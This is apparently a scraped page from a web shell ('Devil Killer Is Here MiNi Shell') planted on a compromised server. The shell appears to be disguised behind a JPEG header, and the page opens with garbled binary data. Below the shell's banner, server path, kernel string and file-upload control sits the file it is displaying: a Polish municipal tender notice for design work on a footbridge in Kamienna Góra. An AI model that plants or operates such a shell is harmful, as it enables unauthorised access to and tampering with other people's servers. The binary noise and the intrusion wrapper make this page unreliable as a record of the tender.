JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210614/0008131101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00081311 z dnia 2021-06-14</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ˜Opracowanie dokumentacji projektowej dla rozbiórki i budowy kładki dla pieszych na rzece Bóbr w rejonie ul. Wiejskiej w Kamiennej Górze </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">˜Gmina Miejska Kamienna Góra</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">˜REGON 230821316</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">˜Plac Grunwaldzi 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">˜Kamienna Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">˜58-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">˜75 64 55 110</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">˜zamowienia@kamiennagora.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">˜www.kamiennagora.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ˜Opracowanie dokumentacji projektowej dla rozbiórki i budowy kładki dla pieszych na rzece Bóbr w rejonie ul. Wiejskiej w Kamiennej Górze </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">˜ocds-148610-b220088f-ccdb-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00081311</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">˜2021/BZP 00007582/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.12 Remont kładki pieszo - rowerowej nad rzeką Bóbr w rejonie ul. Wiejskiej w Kamiennej Górze</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> ˜https://platformazkupowa.pl/kamiennagora <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">˜Zamawiający będzie komunikował się z Wykonawcami za pośrednictwem platformazakupowa.pl podadresem: https://platformazakupowa.pl/kamiennagora.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">˜Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwemplatformazakupowa.pl pod adresem: https://platformazakupowa.pl/kamiennagora.2.Komunikacjamiędzy Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia,wnioski,zawiadomienia orazinformacje, przekazywane są w formie elektronicznej za pośrednictwem platformazakupowa.pl iformularza „Wyślij wiadomość do Zamawiającego”. Za datę przekazania(wpływu)oświadczeń,wniosków,zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.plpoprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego”, po których pojawi się komunikat,że wiadomość została wysłana o Zamawiającego.3. Zamawiający przekazuje Wykonawcominformacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotycząceodpowiedzi na pytania,zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiającyzamieszcza na platformie w sekcji„Komunikaty”. Korespondencja, której zgodnie z obowiązującymiprzepisami adresatem jest konkretny Wykonawca,przekazywana jest w formie elektronicznejza pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy. 4. Zgodnie z § 11 ust.2Rozporządzenia Prezesa Rady Ministrów z dnia 30grudnia 2020 r. w sprawie sposobu sporządzaniai przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych orazśrodków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lubkonkursie,Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracęna platformazakupowa.pl, tj.: 1)stały dostęp do sieci Internet o gwarantowanej przepustowościnie mniejszej niż 512 kb/s, 2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min.2GBRam, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych -MSWindows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,3) zainstalowana dowolnaprzeglądarka internetowa, w przypadku Internet Explorer minimalniewersja10 0., 4) włączona obsługa JavaScript, 5)zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,6)Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej- kodowanieUTF8 7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładnyczas(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegaremGłównego Urzędu Miar</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">˜1. Zamawiający zgodnie z art. 13 ust. 1 i 2 rozporządzeniaParlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawieochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnegoprzepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochroniedanych) (Dz. Urz.UEL119 z 04.05.2016, str. 1), dalej „RODO”, informuje że: 1.1. administratoremPani/Pana danych osobowych jest: Gmina Miejska Kamienna Góra reprezentowana przez BurmistrzaMiasta Kamienna Góra z siedzibą w Kamiennej Górze (58-400) przy Placu Grunwaldzkim 1; 1.2. zadministratorem można się skontaktować poprzez adres e-mail: iod@kamiennagora.pl lub pisemnie naadres siedziby administratora; 1.3. Pani/Pana dane osobowe przetwarzane będą na podstawie art.6ust.1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego;1.4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostaniedokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września2019r. – Prawo zamówieńpublicznych(Dz.U. z 2019 r. poz. 2019 ze zmianami), dalej „Ustawa”; 1.5.Pani/Pana dane osobowebędą przechowywane, zgodnie z art. 78 ust. 1 Ustawy, przez okres 4 lat od dnia zakończeniapostępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4lata, okresprzechowywania obejmuje cały okres obowiązywania umowy; 1.6. obowiązek podania przezPanią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowymokreślonym w przepisach Ustawy,związanym z udziałem w postępowaniu o udzielenie zamówieniapublicznego; 1.7.w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane wsposób zautomatyzowany, stosowanie do art. 22 RODO. 2. Posiada Pani/Pan: 2.1. na podstawieart.15RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; 2.2. na podstawie art.16RODO prawo do sprostowania Pani/Pana danych osobowych; 2.3. na podstawie art.18 RODOprawożądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniemprzypadków, o których mowa w art. 18 ust. 2 RODO;2.4. prawo do wniesienia skargi do PrezesaUrzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,że przetwarzanie danych osobowychPani/Pana dotyczących narusza przepisy RODO; 3. Nie przysługuje Pani/Panu: 3.1. w związku z art.17ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; 3.2. prawo do przenoszeniadanych osobowych, o którym mowa w art. 20 RODO; 3.3. na podstawie art. 21 RODO prawosprzeciwu,wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Panadanych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">˜ZIF.271.13.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ˜Przedmiotem zamówienia jest opracowanie dokumentacji projektowej i kosztorysowej dla rozbiórki istniejącej i budowy nowej kładki dla pieszych, zlokalizowanej na rzece Bóbr, dz. 31/1 obręb 5 Kamienna Góra. Istniejąca kładka stanowi przejście z ul. Wiejskiej do ogródków działkowych znajdujących się na działce nr 27/22 obręb 5 Kamienna Góra, a także do nieruchomości zlokalizowanych przy ul. Nadrzecznej. Przęsło kładki oparte jest na betonowych przyczółkach oraz w środku rozpiętości na betonowym filarze, posadowionym w korycie rzeki. Rozpiętość przęsła wynosi 19,1m a szerokość pomostu 1,81m, szerokość pasa 1,53m. W obecnych warunkach niskiej wody światło pomiędzy lustrem wody a konstrukcją pomostu wynosi ok. 2,5m. Kładka wykonana jest w konstrukcji stalowej spawanej z drewnianym pomostem i obustronnymi stalowymi balustradami. Konstrukcję przęsła stanowią belki stalowe powiązane poziomym układem stężeń. Od obu stron kładka wyposażona jest w zejścia w postaci wylewki betonowej.W wyniku działania wody znacznemu uszkodzeniu uległ pośredni filar kładki, który jest pochylony, a powierzchnia betonu ma liczne spękania. Przemieszczenie podpory nurtowej wpłynęło znacząco na stateczność obiektu, dlatego stanowi poważne zagrożenie wystąpienia katastrofy budowlanej, zwłaszcza podczas wysokich stanów wód i wzburzonego nurtu. Ponadto przyczółki kamienne podpierające most na brzegach posiadają braki materiału kamiennego, oraz widać na nich bardzo mocną degradacje konstrukcji. Konstrukcja stalowa mostu jest mocno skorodowana i posiada zniszczoną powłokę malarską, natomiast na drewnianej kładce zauważyć można liczne wypróchnienia. Dookoła kładki zauważyć można nadmierny porost roślinności. Ogólny stan obiektu określić można jako przed awaryjny, wskazujący nieodwracalne uszkodzenia dyskwalifikujące przydatność użytkową. Do konstrukcji kładki zamocowane są instalacje obce takie jak rurociąg wodociągowy, a także przewód telekomunikacyjny. Teren na którym zlokalizowana jest kładka znajduje się w obszarze szczególnego zagrożenia powodzią.Dokumentacja projektowa i kosztorysowa winna obejmować:1.	rozbiórkę istniejącej kładki dla pieszych 2.	zaprojektowanie nowej kładki o charakterze pieszo – rowerowym o konstrukcji stalowej, stalowo-drewnianej, drewnianej, żelbetowej lub innej oraz parametrach i wymiarach zgodnych z obowiązującymi warunkami technicznymi i normami. 3.	zabezpieczenie/pozostawienie na konstrukcji kładki lub usunięcie kolizji istniejących instalacji obcych tj. rurociąg wodociągowy i przewód telekomunikacyjny wraz z uzyskaniem stosownych uzgodnień z właścicielami urządzeń,4.	uwzględnienie obustronnych zjazdów z kładki z powiązaniem wysokościowym z terenem przyległym,5.	jeśli ocena stanu technicznego obiektu wskaże konieczność napraw/odbudowy istniejących przyczółków i odbudowy podpór (łożysk), należy to ująć w projekcie budowlanym,6.	opracowanie dotyczące gospodarki zielenią, w tym:a.	inwentaryzację istniejącej zieleni i projekt planowanej wycinki lub korekty drzew i krzewów,b.	opracowanie projektu nowych nasadzeń.Założenia ogólne do zakresu dokumentacji projektowej: 1.	Dokumentacja projektowa powinna posiadać wszystkie niezbędne uzgodnienia i opinie, celem złożenia wniosku o pozwolenie na budowę lub dokonania zgłoszenia zamiaru wykonania robót budowlanych właściwemu organowi architektoniczno-budowlanemu. Dokumentacja ma uwzględniać rozwiązania techniczne przebudowy kładki w nawiązaniu do istniejącego zagospodarowania terenu. 2.	Jeżeli zajdzie taka konieczność w odniesieniu do przepisów Prawa wodnego, należy uzyskać wymagane pozwolenia/zgody wodnoprawne wraz z przygotowaniem materiałów np. operatów, ocen stanowiących załącznik do wniosku o uzyskanie pozwoleń/ zgód wodnoprawnych lub zgłoszeń na wykonanie urządzeń jak i korzystanie ze środowiska.3.	Należy również uzyskać decyzję o środowiskowych uwarunkowaniach, jeżeli zajdzie taka konieczność, wynikająca z obowiązujących przepisów.4.	Należy uzyskać warunki techniczne usunięcia kolizji lub przebudowy istniejących instalacji obcych.Do obowiązków Wykonawcy należy:a)	Opracowanie dokumentacji projektowo – kosztorysowej zgodnie z obowiązującym prawem, w tym przepisami techniczno – budowlanymi oraz zasadami wiedzy technicznej w normami;b)	Opracowanie dokumentacji projektowej i kosztorysowej przy zastosowaniu najkorzystniejszych rozwiązań technicznych i ekonomicznych;c)	Wizja lokalna;d)	Uzyskanie mapy do celów projektowych w wymaganym zakresie;e)	Uzyskanie warunków technicznych i uzgodnień w zakresie niezbędnym do opracowania projektów w przypadku kolizji;f)	Uzyskanie wszelkich kompletnych danych wyjściowych i uzgodnień do opracowania dokumentacji projektowej i kosztorysowej;g)	Ponoszenie wszelkich kosztów związanych z opracowaniem dokumentacji i innych niezbędnych opracowań w tym kosztów zakupu map do celów opiniodawczych, do celów projektowych, wypisów i wyrysów z ewidencji gruntów, kosztów uzyskania uzgodnień, opinii, decyzji itp.;h)	Uzyskanie w niezbędnym zakresie wszelkich wymaganych uzgodnień branżowych;i)	Uzyskanie opinii geotechnicznej; jeśli będzie to wymagane;j)	Wykonanie projektu rozwiązania kolizji z urządzeniami podziemnymi w przypadku, gdy takie wystąpią;k)	Uzyskanie pozytywnego uzgodnienia z narady koordynacyjnej ZUD w przypadku konieczności (Wydział Geodezji Starostwa Powiatowego w Kamiennej Górze);l)	Uzyskanie pozwolenia wodnoprawnego/zgody wodnoprawnej, jeżeli dla przyjętych rozwiązań projektowych będzie ono wymagane przepisami prawa;m)	Opracowanie kosztorysów inwestorskich i specyfikacji technicznych wykonania i odbioru robót dla zakresu prac wynikających z projektu budowlanego;n)	Dostarczenie opracowanej dokumentacji w postaci elektronicznej i papierowej;o)	Współdziałanie z Zamawiającym w toku postępowania o wydanie pozwolenia na budowę, w zakresie wynikającym z obowiązków projektanta w rozumieniu ustawy Prawo budowlane;p)	Złożenie, z upoważnienia Zamawiającego, wniosku o pozwolenie na budowę/zgłoszenia robót budowlanych wraz z załącznikami stanowiącymi wymaganą ilość egzemplarzy dokumentacji projektowej;q)	Uzupełnienie braków do złożonego wniosku o wydanie decyzji pozwolenie na budowę/zgłoszenia robót budowlanych;r)	Niezwłoczne i nieodpłatne udzielania Zamawiającemu wyjaśnień do przedmiotu umowy na etapie organizowania przetargu na wybór wykonawcy robót budowlanych oraz w trakcie trwania procedury przetargowej, tzn. w terminie nie dłuższym niż 48 godzin od momentu otrzymania zapytań od Zamawiającego pocztą elektroniczną lub faksem. Odpowiedzi udzielane będą w pierwszej kolejności pocztą elektroniczną, następnie faksem lub w formie pisemnej;s)	Informowanie Zamawiającego o problemach lub okolicznościach mogących wpłynąć na jakość lub termin zakończenia wykonania opracowań projektowych i innych prac będących przedmiotem umowy;t)	Ponoszenie pełnej odpowiedzialności za błędy projektowe, które zostaną stwierdzone w opracowanym dokumencie. Uzgodnienie przedmiotu umowy przez Zamawiającego nie zwalnia Wykonawcy od odpowiedzialności za błędy ujawnione po odbiorze dokumentacji oraz w trakcie realizacji robót budowlanych. W przypadku stwierdzenia błędów obowiązkiem Wykonawcy będzie ich niezwłoczne poprawienie własnym kosztem i staraniem;u)	Sprawowanie nadzoru autorskiego;v)	Przedkładanie na adres e-mail: magdalena.milczarek@kamiennagora.pl raportów miesięcznych z postępu wykonania opracowań projektowych w formie pisemnej. Raport miesięczny ma na celu kontrolę prac projektowych, informowania o problemach w wykonywaniu dokumentacji, zwłoce w uzyskaniu warunków technicznych, opinii, decyzji i innych problemach rzutujących na wykonanie przedmiotu Umowy. Wykonawca ma obowiązek w pierwszym tygodniu każdego miesiąca dostarczyć Zamawiającemu raport miesięczny w odniesieniu do ostatniego dnia poprzedniego miesiąca. Raport musi zawierać plan pracy na kolejny miesiąc, analizę planowanych i zrealizowanych założeń z poprzedniego miesiąca, informację o napotkanych problemach, a w przypadku opóźnień/zwłoki z uzasadnieniem opóźnień/zwłokioraz wszystkie inne wymagania określone w istotnych postanowienia umowy.Uwaga: W przypadku gdy przebudowa obiektów wymagała będzie odrębnej decyzji pozwolenia na budowę lub zgłoszenia zamiaru wykonania obiektów lub robót budowlanych, Wykonawca zobowiązany jest do uzyskania tych decyzji - wynagrodzenie z tego tytułu skalkulowane winno być w ofercie.Jeśli Projektant uzna, że dla realizowanego przedsięwzięcia nie jest wymagane, zgodnie z obowiązującymi przepisami, uzyskanie określonych wyżej decyzji, pozwoleń, należy dołączyć do dokumentacji opinię organu właściwego dla wydania przedmiotowej decyzji lub wyjaśnienie przywołujące odpowiednie przepisy, potwierdzające brak konieczności ich uzyskania.Załączniki do opisu przedmiotu zamówienia stanowią:1.	Lokalizacja terenu opracowania.2.	Inwentaryzacja fotograficzna terenu opracowania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71300000-1 - Usługi inżynieryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">˜5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">˜Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">˜Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">˜Przedłużenie minimalnego okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> ˜O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczącezdolności technicznej lub zawodowej. Wykonawca spełni warunek, jeżeli wykaże, że:a) Dysponuje co najmniej 1 osobą posiadającą uprawnienia budowlane do projektowania bezograniczeń w specjalności inżynieryjnej mostowej oraz będącą członkiem właściwej terytorialnieIzby Inżynierów Budownictwa;Osoby odpowiedzialne za kierowanie robotami budowlanymi muszą posiadać uprawnienia dowykonywania samodzielnych funkcji technicznych w budownictwie odpowiadające wymaganiomokreślonym w ustawie – Prawo budowlane (Dz. U. z 2019 r., poz. 1186 z późn. zm.) lubodpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniejobowiązujących przepisów oraz odpowiadające wymaganiom określonym w ustawie osamorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r., poz.1117 z późn. zm.). W przypadku uprawnień budowlanych wydanych na podstawie wcześniejobowiązujących przepisów – uprawnienia muszą obejmować zakres zamówienia.W przypadku, gdy Wykonawca wykazuje osoby, które nabyły kwalifikacje wymagane dowykonywania działalności w budownictwie poza terytorium RP, osoby te muszą posiadaćdecyzje o uznaniu kwalifikacji zawodowych w danej branży budowlanej zgodnie z ustawą z dnia22 grudnia 2015 r. o zasadach uznawania 